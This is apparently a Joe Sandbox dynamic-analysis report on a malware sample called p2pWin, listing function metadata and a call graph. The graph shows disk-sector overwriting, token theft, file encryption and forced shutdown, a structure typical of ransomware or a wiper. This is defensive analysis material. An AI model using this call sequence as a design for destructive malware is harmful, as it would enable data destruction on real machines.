                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 3470314060-0
                                                • Opcode ID: b748bd92821823ee2c8fd21702654b616c00cbe2007cc1a95022bbdb860fac41
                                                • Instruction ID: 1699314a838e0fbe1c6da7d1b51b55209f8a0f3d33b845bdbd11d30f18ffd859
                                                • Opcode Fuzzy Hash: b748bd92821823ee2c8fd21702654b616c00cbe2007cc1a95022bbdb860fac41
                                                • Instruction Fuzzy Hash: 9D01D632A01712ABDB63AFA49446BDDB3E9BF04B60F104006F400A7692CF389E41CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00034BC0 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _malloc.LIBCMT ref: 00034BCE
                                                  • Part of subcall function 00034AAA: __FF_MSGBANNER.LIBCMT ref: 00034AC3
                                                  • Part of subcall function 00034AAA: __NMSG_WRITE.LIBCMT ref: 00034ACA
                                                  • Part of subcall function 00034AAA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00033D76,?,00000001,?,?,00032961,00000018,00090170,0000000C,000329F1), ref: 00034AEF
                                                • _free.LIBCMT ref: 00034BE1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID:
                                                • API String ID: 1020059152-0
                                                • Opcode ID: b5adf2f4bdab92c21182bba0f6deeba2597a95aa579056da852a1c0aa71222fb
                                                • Instruction ID: 26710cf6c18a13613dd7f3dcb417077f011c6e1f03be8ffc863bc6db41f6202c
                                                • Opcode Fuzzy Hash: b5adf2f4bdab92c21182bba0f6deeba2597a95aa579056da852a1c0aa71222fb
                                                • Instruction Fuzzy Hash: D011E336406619ABCB737F74AC05B9E37DDAF803A1F209425F9499E152DF38E8818690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00034104 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __getptd.LIBCMT ref: 00034110
                                                  • Part of subcall function 00032296: __getptd_noexit.LIBCMT ref: 00032299
                                                  • Part of subcall function 00032296: __amsg_exit.LIBCMT ref: 000322A6
                                                • __getptd.LIBCMT ref: 00034127
                                                • __amsg_exit.LIBCMT ref: 00034135
                                                • __lock.LIBCMT ref: 00034145
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00034159
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 0c83fb4aac9c5af6129f8a847e8cafbde9112ddaa26596e3d444dfdaa18ff60e
                                                • Instruction ID: 7f50552f72cb4cb3963ed826214fc5a6cc63bfa4b3488bcd295859d09867f4d4
                                                • Opcode Fuzzy Hash: 0c83fb4aac9c5af6129f8a847e8cafbde9112ddaa26596e3d444dfdaa18ff60e
                                                • Instruction Fuzzy Hash: E3F09032A05B119BE763BBA498037DE33E8BF14721F50410AF400AB2C3DB7469809A5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000320F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • TlsGetValue.KERNEL32(?,00032234,?,00031737,00000003), ref: 00032101
                                                • DecodePointer.KERNEL32(?,00031737,00000003), ref: 00032113
                                                • TlsSetValue.KERNEL32(00000000,?,00031737,00000003), ref: 00032122
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Value$DecodePointer
                                                • String ID: PNv
                                                • API String ID: 721062344-4070351811
                                                • Opcode ID: 8522c18bcf17021c52df5973738f8dd3308801213d4e7172d2c8ce2ca57ab6be
                                                • Instruction ID: 6f9c92fcbedaf11a24de3b43548a4c75dc917ab3ffbdf4da887801ffc6516ee5
                                                • Opcode Fuzzy Hash: 8522c18bcf17021c52df5973738f8dd3308801213d4e7172d2c8ce2ca57ab6be
                                                • Instruction Fuzzy Hash: A0D01731504021ABA7231B12BD098C63FAAEB853A23024022FA05D3230E63E4C488E90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00032D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • DecodePointer.KERNEL32(?,00032DC2,00000000,00000000,00000000,00000000,00000000,000334F1,?,00031737,00000003), ref: 00032D94
                                                • __invoke_watson.LIBCMT ref: 00032DB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1631014535.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                • Associated: 00000000.00000002.1630961626.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631072955.0000000000091000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1631086483.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_30000_p2pWin.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer__invoke_watson
                                                • String ID: PNv
                                                • API String ID: 4034010525-4070351811
                                                • Opcode ID: 7d58643cfadaedc3f451affa14d10f3316605741343bf125a4e28fb9ca0c2d2c
                                                • Instruction ID: 98413345130947fbb21fd1ec6d942d832ca7e2b8b92762c9f376773bbf1d8bd0
                                                • Opcode Fuzzy Hash: 7d58643cfadaedc3f451affa14d10f3316605741343bf125a4e28fb9ca0c2d2c
                                                • Instruction Fuzzy Hash: 78E0BD32104209BBDF162FA1EC0A8AA3B6AEB44750B944460BE1580022DA3BC831AAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:14.5%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:19%
                                                Total number of Nodes:1745
                                                Total number of Limit Nodes:28
                                                execution_graph 5751 2e594a5 FreeLibrary 5752 2e594c7 CreateFileW 5751->5752 5753 2e5958b 5751->5753 5754 2e594f2 GetFileSize FindCloseChangeNotification CreateFileW 5752->5754 5755 2e5955e DeleteFileW 5752->5755 5754->5755 5756 2e5951b GetProcessHeap RtlAllocateHeap 5754->5756 5763 2e59367 5755->5763 5758 2e59555 CloseHandle 5756->5758 5759 2e59536 WriteFile GetProcessHeap HeapFree 5756->5759 5758->5755 5759->5758 5761 2e59584 ExitProcess 5764 2e59497 5763->5764 5765 2e5938b VirtualProtect 5763->5765 5764->5761 5772 2e57deb 5764->5772 5765->5764 5770 2e593ef 5765->5770 5767 2e5947a VirtualProtect 5767->5764 5768 2e59474 5768->5764 5768->5767 5769 2e59401 LoadLibraryA 5769->5770 5770->5767 5770->5768 5770->5769 5771 2e5944b GetProcAddress 5770->5771 5771->5770 5773 2e57df8 5772->5773 5842 2e57cc0 5773->5842 5775 2e57e00 5776 2e57e14 WSAStartup 5775->5776 5777 2e57e06 5775->5777 5863 2e57091 GetProcessHeap HeapAlloc 5776->5863 5982 2e59590 5777->5982 5781 2e57091 13 API calls 5782 2e57e53 InitializeCriticalSection 5781->5782 5869 2e56a2b 5782->5869 5785 2e57e84 5901 2e584df GetLocalTime 5785->5901 5791 2e57ea4 5792 2e57eb2 5791->5792 5915 2e57545 5791->5915 5943 2e570fa 5792->5943 5795 2e57ebd 5796 2e57ed4 5795->5796 5946 2e58999 FindResourceW 5795->5946 5798 2e57ff1 5796->5798 5799 2e57ee1 5796->5799 5801 2e570fa 3 API calls 5798->5801 5800 2e57091 13 API calls 5799->5800 5803 2e57ef3 5800->5803 5802 2e57ffc CreateThread 5801->5802 5963 2e58282 5802->5963 7434 2e5a0fe 5802->7434 5993 2e5875a 5803->5993 5807 2e57f04 5807->5798 5813 2e57f15 CreateThread 5807->5813 5818 2e57f70 SetLastError CreateThread 5807->5818 6012 2e57298 5807->6012 5808 2e58043 CreateThread 5809 2e5806b Sleep 5808->5809 5810 2e5805e GetProcessHeap HeapFree 5808->5810 7452 2e5a274 Sleep 5808->7452 5811 2e58086 5809->5811 5812 2e5808b Sleep 5809->5812 5810->5809 5969 2e51eef GetLogicalDrives 5811->5969 5815 2e580a0 memset GetVersionExW 5812->5815 5816 2e5811b Sleep wsprintfW 5812->5816 5813->5807 5817 2e57f34 SetThreadToken 5813->5817 7461 2e59f8e GetCurrentThread OpenThreadToken 5813->7461 5815->5816 5836 2e580cd 5815->5836 5975 2e583bd wsprintfW GetEnvironmentVariableW 5816->5975 5820 2e57f55 GetLastError 5817->5820 5821 2e57f45 ResumeThread 5817->5821 5818->5807 5824 2e57f98 SetThreadToken 5818->5824 7484 2e57d58 5818->7484 5823 2e57f5e CloseHandle 5820->5823 5821->5818 5822 2e57f53 5821->5822 5822->5823 5823->5818 5826 2e57fa9 ResumeThread 5824->5826 5827 2e57fca CloseHandle 5824->5827 5831 2e57fc4 GetLastError 5826->5831 5832 2e57fb7 WaitForSingleObject 5826->5832 5827->5807 5828 2e58114 ExitProcess 5829 2e58163 GetModuleHandleA 5833 2e58192 InitiateSystemShutdownExW 5829->5833 5834 2e58172 GetProcAddress 5829->5834 5831->5827 5832->5827 5833->5828 5839 2e581ac ExitWindowsEx 5833->5839 5834->5833 5838 2e58182 NtRaiseHardError 5834->5838 5836->5816 6027 2e56bb0 5836->6027 5837 2e58104 6039 2e57d6f 5837->6039 5838->5833 5839->5828 5843 2e57d37 5842->5843 5844 2e57ccb GetTickCount 5842->5844 5843->5775 6048 2e581ba GetCurrentProcess OpenProcessToken 5844->6048 5846 2e57ce0 5847 2e581ba 6 API calls 5846->5847 5848 2e57cef 5847->5848 5849 2e581ba 6 API calls 5848->5849 5850 2e57d00 5849->5850 6053 2e58677 CreateToolhelp32Snapshot 5850->6053 5853 2e57d31 CreateFileW 5855 2e58b6a 5853->5855 5856 2e58afa GetFileSize 5853->5856 5855->5775 5857 2e58b60 CloseHandle 5856->5857 5858 2e58b09 GetProcessHeap HeapAlloc 5856->5858 5857->5855 5859 2e58b4c 5858->5859 5860 2e58b1f ReadFile 5858->5860 5859->5857 5860->5859 5861 2e58b36 5860->5861 5861->5859 5862 2e58b3b GetProcessHeap HeapFree 5861->5862 5862->5859 5864 2e570f1 5863->5864 5865 2e570b2 InitializeCriticalSection GetProcessHeap HeapAlloc 5863->5865 5864->5781 5865->5864 5866 2e570ea 5865->5866 6060 2e57003 5866->6060 5870 2e56ad5 5869->5870 5871 2e56a3b 5869->5871 5870->5785 5884 2e5835e 5870->5884 5871->5870 5872 2e56a56 CommandLineToArgvW 5871->5872 5872->5870 5873 2e56a6d 5872->5873 5874 2e56a72 StrToIntW 5873->5874 5875 2e56ace LocalFree 5873->5875 5876 2e56a82 5874->5876 5875->5870 5877 2e56ac3 5876->5877 5878 2e56a8c StrStrW 5876->5878 5877->5875 5879 2e56ac5 5878->5879 5880 2e56a9f StrChrW 5878->5880 6081 2e569a2 5879->6081 5880->5876 5881 2e56aac 5880->5881 6067 2e56de0 5881->6067 6093 2e58320 PathFindFileNameW PathCombineW 5884->6093 5887 2e57e7f 5891 2e58d5a CreateFileA 5887->5891 5888 2e5837a PathFileExistsW 5889 2e583b6 ExitProcess 5888->5889 5890 2e5838c CreateFileW 5888->5890 5890->5887 5892 2e58d85 DeviceIoControl 5891->5892 5893 2e58de6 5891->5893 5894 2e58da4 LocalAlloc 5892->5894 5895 2e58ddf FindCloseChangeNotification 5892->5895 5899 2e58df4 5893->5899 6096 2e514a9 7 API calls 5893->6096 5894->5895 5896 2e58db9 SetFilePointer WriteFile LocalFree 5894->5896 5895->5893 5896->5895 5900 2e58dfd 5899->5900 6128 2e58cbf CreateFileA 5899->6128 5900->5785 6181 2e56973 GetTickCount 5901->6181 5903 2e584fc GetSystemDirectoryW 5905 2e58541 PathAppendW 5903->5905 5914 2e57e89 CreateThread 5903->5914 5906 2e58557 5905->5906 5905->5914 6182 2e58494 memset GetVersionExW 5906->6182 5909 2e58594 wsprintfW 5911 2e585b2 5909->5911 5910 2e58560 wsprintfW 5910->5911 5913 2e583bd 6 API calls 5911->5913 5913->5914 5914->5791 5914->5792 7420 2e57c10 5914->7420 6184 2e5a4f0 5915->6184 5918 2e57582 5919 2e57589 FindResourceW 5918->5919 5920 2e575a5 5919->5920 5922 2e575b2 5919->5922 6186 2e585d0 LoadResource 5920->6186 5923 2e57777 5922->5923 5924 2e575c0 GetTempPathW 5922->5924 5923->5792 5925 2e57755 GetProcessHeap RtlFreeHeap 5924->5925 5926 2e575da GetTempFileNameW 5924->5926 5925->5923 5926->5925 5928 2e575f8 CoCreateGuid 5926->5928 5928->5925 5929 2e57616 StringFromCLSID 5928->5929 5929->5925 5930 2e5762f 5929->5930 6195 2e573ae CreateFileW 5930->6195 5933 2e57649 wsprintfW CreateThread 5935 2e57686 memset wsprintfW CreateProcessW 5933->5935 5936 2e5771b 5933->5936 6231 2e573fd GetProcessHeap HeapAlloc 5933->6231 5934 2e5774a CoTaskMemFree 5934->5925 5937 2e57712 CloseHandle 5935->5937 5938 2e576ef WaitForSingleObject 5935->5938 5940 2e573ae 3 API calls 5936->5940 5937->5936 5939 2e570fa 3 API calls 5938->5939 5941 2e57708 TerminateThread 5939->5941 5942 2e5773d DeleteFileW 5940->5942 5941->5937 5942->5934 5944 2e5711c 5943->5944 5945 2e570fe EnterCriticalSection InterlockedExchange LeaveCriticalSection 5943->5945 5944->5795 5945->5795 5947 2e589c3 5946->5947 5948 2e589d0 5946->5948 5949 2e585d0 13 API calls 5947->5949 5950 2e58abd SetLastError 5948->5950 5951 2e589dc GetProcessHeap HeapAlloc 5948->5951 5949->5948 5950->5796 5952 2e58a12 SHGetFolderPathW 5951->5952 5953 2e58a08 GetWindowsDirectoryW 5951->5953 5954 2e58a24 5952->5954 5955 2e58a59 GetProcessHeap HeapFree 5952->5955 5953->5954 5954->5955 5957 2e58a46 PathAppendW 5954->5957 5956 2e58a6d 5955->5956 5958 2e58a96 GetProcessHeap HeapFree 5956->5958 6249 2e58946 CreateFileW 5956->6249 5957->5956 5958->5950 5962 2e58a88 GetLastError 5962->5958 6254 2e56973 GetTickCount 5963->6254 5965 2e5828e NetServerGetInfo 5966 2e582b5 5965->5966 5967 2e582c0 NetApiBufferFree 5966->5967 5968 2e58029 GetProcessHeap HeapAlloc 5966->5968 5967->5968 5968->5808 5968->5809 5970 2e51f04 5969->5970 5971 2e51f0f GetDriveTypeW 5970->5971 5972 2e51f6f 5970->5972 5971->5970 5973 2e51f39 LocalAlloc 5971->5973 5972->5812 5973->5970 5974 2e51f47 CreateThread 5973->5974 5974->5970 6255 2e51e51 CryptAcquireContextW 5974->6255 5976 2e5840a GetSystemDirectoryW 5975->5976 5979 2e58432 5975->5979 5977 2e5841c lstrcatW 5976->5977 5978 2e5815a 5976->5978 5977->5978 5977->5979 5978->5828 5978->5829 5979->5979 5980 2e5844c CreateProcessW 5979->5980 5980->5978 5981 2e5847b Sleep 5980->5981 5981->5978 5983 2e595a3 5982->5983 5984 2e5967a 5982->5984 5983->5984 5985 2e595af VirtualAlloc 5983->5985 5984->5776 5985->5984 5986 2e595dc memcpy 5985->5986 5987 2e59649 VirtualProtect 5986->5987 5988 2e595fa 5986->5988 5987->5984 5989 2e5965e VirtualFree 5987->5989 5988->5987 6335 2e59286 VirtualProtect 5988->6335 5989->5984 5994 2e5a4f0 5993->5994 5995 2e5876a memset 5994->5995 5996 2e58494 2 API calls 5995->5996 5997 2e5879d CreateToolhelp32Snapshot 5996->5997 5998 2e587b7 Process32FirstW 5997->5998 5999 2e58939 5997->5999 6000 2e58929 GetLastError 5998->6000 6008 2e587d3 5998->6008 5999->5807 6002 2e5892f CloseHandle 6000->6002 6001 2e587e8 OpenProcess 6003 2e58811 OpenProcessToken 6001->6003 6001->6008 6002->5999 6005 2e588f7 CloseHandle CloseHandle 6003->6005 6006 2e58826 GetTokenInformation 6003->6006 6004 2e58910 Process32NextW 6004->6001 6007 2e58927 6004->6007 6005->6008 6006->6005 6006->6008 6007->6002 6008->6001 6008->6002 6008->6004 6008->6005 6009 2e58858 DuplicateTokenEx 6008->6009 6011 2e588b9 SetTokenInformation 6008->6011 6009->6005 6010 2e58875 memset GetTokenInformation 6009->6010 6010->6005 6010->6008 6011->6005 6011->6008 6013 2e573a5 6012->6013 6014 2e572ae 6012->6014 6013->5807 6014->6013 6015 2e572b7 EnterCriticalSection 6014->6015 6339 2e571d6 6015->6339 6018 2e5739d LeaveCriticalSection 6018->6013 6019 2e572e0 GetProcessHeap HeapAlloc 6019->6018 6021 2e57306 GetProcessHeap HeapAlloc 6019->6021 6020 2e57363 GetProcessHeap HeapReAlloc 6020->6018 6022 2e57384 6020->6022 6023 2e57325 memcpy 6021->6023 6024 2e57353 GetProcessHeap HeapFree 6021->6024 6025 2e57298 3 API calls 6022->6025 6023->6018 6024->6018 6026 2e5739a 6025->6026 6026->6018 6350 2e56973 GetTickCount 6027->6350 6029 2e56bbe wsprintfW 6031 2e56be5 6029->6031 6031->6031 6032 2e56bf0 EnterCriticalSection 6031->6032 6033 2e56c12 6032->6033 6034 2e56c0d 6032->6034 6036 2e56c36 StrCatW StrCatW 6033->6036 6037 2e56c58 SetLastError 6033->6037 6351 2e56af0 6034->6351 6038 2e56c60 LeaveCriticalSection 6036->6038 6037->6038 6038->5837 6040 2e57d83 6039->6040 6047 2e57dde 6039->6047 6040->6040 6040->6047 6371 2e596c7 6040->6371 6043 2e57db2 Sleep 6044 2e58320 3 API calls 6043->6044 6045 2e57dc9 6044->6045 6046 2e57dcd PathFileExistsW 6045->6046 6045->6047 6046->6047 6047->5816 6047->5828 6049 2e58231 SetLastError 6048->6049 6050 2e581ef LookupPrivilegeValueW 6048->6050 6049->5846 6050->6049 6051 2e58201 AdjustTokenPrivileges GetLastError 6050->6051 6051->6049 6052 2e5822f 6051->6052 6052->6049 6054 2e57d12 GetModuleFileNameW 6053->6054 6055 2e5869a Process32FirstW 6053->6055 6054->5843 6054->5853 6056 2e5874c CloseHandle 6055->6056 6057 2e586bc Process32NextW 6055->6057 6056->6054 6059 2e58749 6057->6059 6059->6056 6061 2e5708f 6060->6061 6065 2e5700f 6060->6065 6061->5864 6062 2e57085 GetProcessHeap HeapFree 6062->6061 6063 2e5707b GetProcessHeap HeapFree 6063->6062 6064 2e57060 GetProcessHeap HeapFree 6064->6065 6065->6062 6065->6063 6065->6064 6066 2e5704e GetProcessHeap HeapFree 6065->6066 6066->6064 6068 2e56df9 6067->6068 6068->6068 6069 2e56e04 GetProcessHeap HeapAlloc 6068->6069 6070 2e56ed0 6069->6070 6071 2e56e2b memcpy 6069->6071 6070->5876 6073 2e56e59 6071->6073 6073->6073 6074 2e56e64 GetProcessHeap HeapAlloc 6073->6074 6075 2e56ec6 GetProcessHeap HeapFree 6074->6075 6076 2e56e81 memcpy 6074->6076 6075->6070 6078 2e57298 14 API calls 6076->6078 6079 2e56eb6 6078->6079 6079->6070 6080 2e56ebd GetProcessHeap HeapFree 6079->6080 6080->6075 6082 2e569d0 CommandLineToArgvW 6081->6082 6083 2e569bc 6081->6083 6084 2e56a24 6082->6084 6085 2e569e4 6082->6085 6083->6082 6084->5877 6086 2e56a1d LocalFree 6085->6086 6088 2e56a1c 6085->6088 6089 2e56fc7 6085->6089 6086->6084 6088->6086 6090 2e56ffb 6089->6090 6091 2e56fd1 6089->6091 6090->6085 6091->6090 6092 2e57298 14 API calls 6091->6092 6092->6090 6094 2e58344 PathFindExtensionW 6093->6094 6095 2e58351 6093->6095 6094->6095 6095->5887 6095->5888 6133 2e51038 memset memset 6096->6133 6099 2e515a2 6099->5899 6104 2e515e8 6163 2e512d5 6104->6163 6106 2e51632 6106->6099 6108 2e51661 memset 6109 2e51424 5 API calls 6108->6109 6110 2e5168d 6109->6110 6110->6099 6111 2e51424 5 API calls 6110->6111 6112 2e516a8 6111->6112 6112->6099 6113 2e516b5 memcpy 6112->6113 6115 2e516d8 6113->6115 6114 2e516f0 memcpy 6116 2e5170c 6114->6116 6115->6114 6115->6116 6116->6099 6117 2e51758 memcpy 6116->6117 6118 2e51751 6116->6118 6117->6118 6118->6099 6118->6106 6119 2e517e7 memcpy 6118->6119 6120 2e5182c 6119->6120 6121 2e51808 6119->6121 6120->6099 6123 2e51384 6 API calls 6120->6123 6121->6120 6172 2e51384 6121->6172 6124 2e51852 6123->6124 6124->6099 6125 2e51384 6 API calls 6124->6125 6126 2e51871 6125->6126 6126->6099 6127 2e51384 6 API calls 6126->6127 6127->6099 6129 2e58ce7 6128->6129 6130 2e58ceb DeviceIoControl LocalAlloc 6128->6130 6129->5900 6131 2e58d4b FindCloseChangeNotification 6130->6131 6132 2e58d1b DeviceIoControl WriteFile LocalFree 6130->6132 6131->6129 6132->6131 6134 2e510fb 6133->6134 6135 2e510b0 memset GetSystemDirectoryA 6133->6135 6134->6099 6147 2e5122d 6134->6147 6136 2e510ed GetLastError 6135->6136 6137 2e5110a CreateFileA 6135->6137 6136->6134 6137->6136 6138 2e5112d DeviceIoControl 6137->6138 6139 2e51166 _itoa 6138->6139 6140 2e5114a GetLastError 6138->6140 6143 2e51180 6139->6143 6142 2e51154 6140->6142 6141 2e51213 CloseHandle 6141->6134 6142->6141 6143->6142 6144 2e511c2 memcpy 6143->6144 6145 2e511de 6143->6145 6144->6145 6145->6141 6146 2e511fe memcpy 6145->6146 6146->6141 6148 2e51242 6147->6148 6149 2e5124c CreateFileA 6147->6149 6148->6099 6155 2e51424 CryptAcquireContextA 6148->6155 6150 2e51280 DeviceIoControl 6149->6150 6151 2e51268 GetLastError 6149->6151 6152 2e512a3 GetLastError 6150->6152 6153 2e512ad CloseHandle 6150->6153 6151->6148 6152->6153 6153->6148 6156 2e51457 GetLastError 6155->6156 6157 2e5146a CryptGenRandom 6155->6157 6160 2e5145d 6156->6160 6158 2e5147d GetLastError 6157->6158 6159 2e51483 6157->6159 6158->6159 6161 2e51495 CryptReleaseContext 6159->6161 6162 2e514a0 6159->6162 6160->6157 6160->6159 6161->6162 6162->6099 6162->6104 6164 2e512f1 memset CreateFileA 6163->6164 6169 2e512e7 6163->6169 6165 2e51337 SetFilePointerEx 6164->6165 6166 2e5131f GetLastError 6164->6166 6167 2e5135e GetLastError 6165->6167 6168 2e5134a ReadFile 6165->6168 6166->6169 6171 2e51368 6167->6171 6168->6167 6170 2e51374 CloseHandle 6168->6170 6169->6099 6169->6106 6169->6108 6170->6169 6171->6170 6173 2e51397 6172->6173 6174 2e5139e CreateFileA 6172->6174 6173->6121 6175 2e513d2 SetFilePointerEx 6174->6175 6176 2e513ba GetLastError 6174->6176 6177 2e513e6 WriteFile 6175->6177 6178 2e513fe GetLastError 6175->6178 6176->6173 6177->6178 6179 2e51414 CloseHandle 6177->6179 6180 2e51408 6178->6180 6179->6173 6180->6179 6181->5903 6183 2e584d0 6182->6183 6183->5909 6183->5910 6185 2e57552 GetCurrentProcess GetModuleHandleW GetProcAddress 6184->6185 6185->5918 6185->5919 6187 2e5864c 6186->6187 6188 2e585f0 LockResource 6186->6188 6187->5922 6188->6187 6189 2e585fe SizeofResource 6188->6189 6189->6187 6190 2e58614 GetProcessHeap RtlAllocateHeap 6189->6190 6190->6187 6191 2e5862e 6190->6191 6200 2e5a520 6191->6200 6193 2e58648 6193->6187 6194 2e58661 GetProcessHeap HeapFree 6193->6194 6194->6187 6196 2e573f5 6195->6196 6197 2e573d1 WriteFile 6195->6197 6196->5933 6196->5934 6198 2e573ee FindCloseChangeNotification 6197->6198 6199 2e573e8 6197->6199 6198->6196 6199->6198 6205 2e5bb31 6200->6205 6203 2e5a569 6203->6193 6214 2e5baa4 6205->6214 6207 2e5a559 6207->6203 6208 2e5a5cc 6207->6208 6212 2e5ac60 6208->6212 6213 2e5a5e0 6208->6213 6210 2e5aa1f memcpy 6210->6213 6211 2e5b8df 6211->6212 6225 2e5bc5b 6211->6225 6212->6203 6213->6210 6213->6211 6213->6212 6215 2e5bab1 6214->6215 6216 2e5bac3 6214->6216 6215->6216 6219 2e5c223 6215->6219 6221 2e5c27f 6215->6221 6216->6207 6220 2e5c226 malloc 6219->6220 6220->6216 6222 2e5c226 malloc 6221->6222 6223 2e5c27d 6221->6223 6222->6216 6223->6221 6224 2e5c289 6223->6224 6224->6216 6224->6224 6226 2e5bc71 6225->6226 6227 2e5bcb1 memcpy 6226->6227 6228 2e5bcc9 memcpy 6226->6228 6229 2e5bc8a 6226->6229 6227->6229 6228->6229 6230 2e5bce8 memcpy 6228->6230 6229->6212 6230->6229 6232 2e5753c 6231->6232 6233 2e57438 InitializeSecurityDescriptor 6231->6233 6233->6232 6234 2e57449 SetSecurityDescriptorDacl 6233->6234 6234->6232 6235 2e5745e CreateNamedPipeW 6234->6235 6235->6235 6236 2e5747c ConnectNamedPipe 6235->6236 6237 2e5748c 6236->6237 6238 2e5752e CloseHandle 6236->6238 6239 2e5748f PeekNamedPipe 6237->6239 6240 2e574ad Sleep 6237->6240 6241 2e574be GetProcessHeap HeapAlloc 6237->6241 6242 2e574bc 6237->6242 6238->6235 6239->6237 6240->6237 6243 2e5751c FlushFileBuffers DisconnectNamedPipe 6241->6243 6244 2e574d2 ReadFile 6241->6244 6242->6243 6243->6238 6245 2e57511 GetProcessHeap HeapFree 6244->6245 6246 2e574eb 6244->6246 6245->6243 6246->6245 6247 2e574f3 StrChrW 6246->6247 6248 2e56de0 24 API calls 6246->6248 6247->6245 6247->6246 6248->6245 6250 2e58991 6249->6250 6251 2e58970 WriteFile 6249->6251 6250->5958 6250->5962 6252 2e58984 6251->6252 6253 2e5898a FindCloseChangeNotification 6251->6253 6252->6253 6253->6250 6254->5965 6256 2e51ea9 6255->6256 6257 2e51e7a GetLastError 6255->6257 6269 2e51b4e CryptGenKey 6256->6269 6259 2e51e87 6257->6259 6261 2e51e9a CryptAcquireContextW 6259->6261 6262 2e51edc 6259->6262 6261->6256 6261->6262 6264 2e51edf LocalFree 6262->6264 6263 2e51ecf CryptReleaseContext 6263->6264 6270 2e51b73 CryptSetKeyParam CryptSetKeyParam 6269->6270 6271 2e51b99 6269->6271 6270->6271 6271->6263 6272 2e51973 6271->6272 6273 2e51b46 6272->6273 6274 2e5198b PathCombineW 6272->6274 6286 2e51d32 6273->6286 6274->6273 6275 2e519a9 FindFirstFileW 6274->6275 6275->6273 6280 2e519c9 6275->6280 6276 2e519d9 WaitForSingleObject 6277 2e51b3c FindClose 6276->6277 6276->6280 6277->6273 6278 2e51b25 FindNextFileW 6278->6277 6278->6280 6279 2e51a6b PathCombineW 6279->6278 6279->6280 6280->6276 6280->6277 6280->6278 6280->6279 6281 2e51ac2 PathFindExtensionW 6280->6281 6282 2e51a9a StrStrIW 6280->6282 6283 2e51973 9 API calls 6280->6283 6284 2e51aeb wsprintfW StrStrIW 6280->6284 6303 2e5189a CreateFileW 6280->6303 6281->6280 6282->6278 6282->6280 6283->6280 6284->6278 6284->6280 6314 2e51ba0 CryptStringToBinaryW 6286->6314 6289 2e51e4c CryptDestroyKey 6289->6263 6292 2e51d61 PathCombineW 6293 2e51e40 LocalFree 6292->6293 6294 2e51d7e 6292->6294 6293->6289 6334 2e56973 GetTickCount 6294->6334 6296 2e51d83 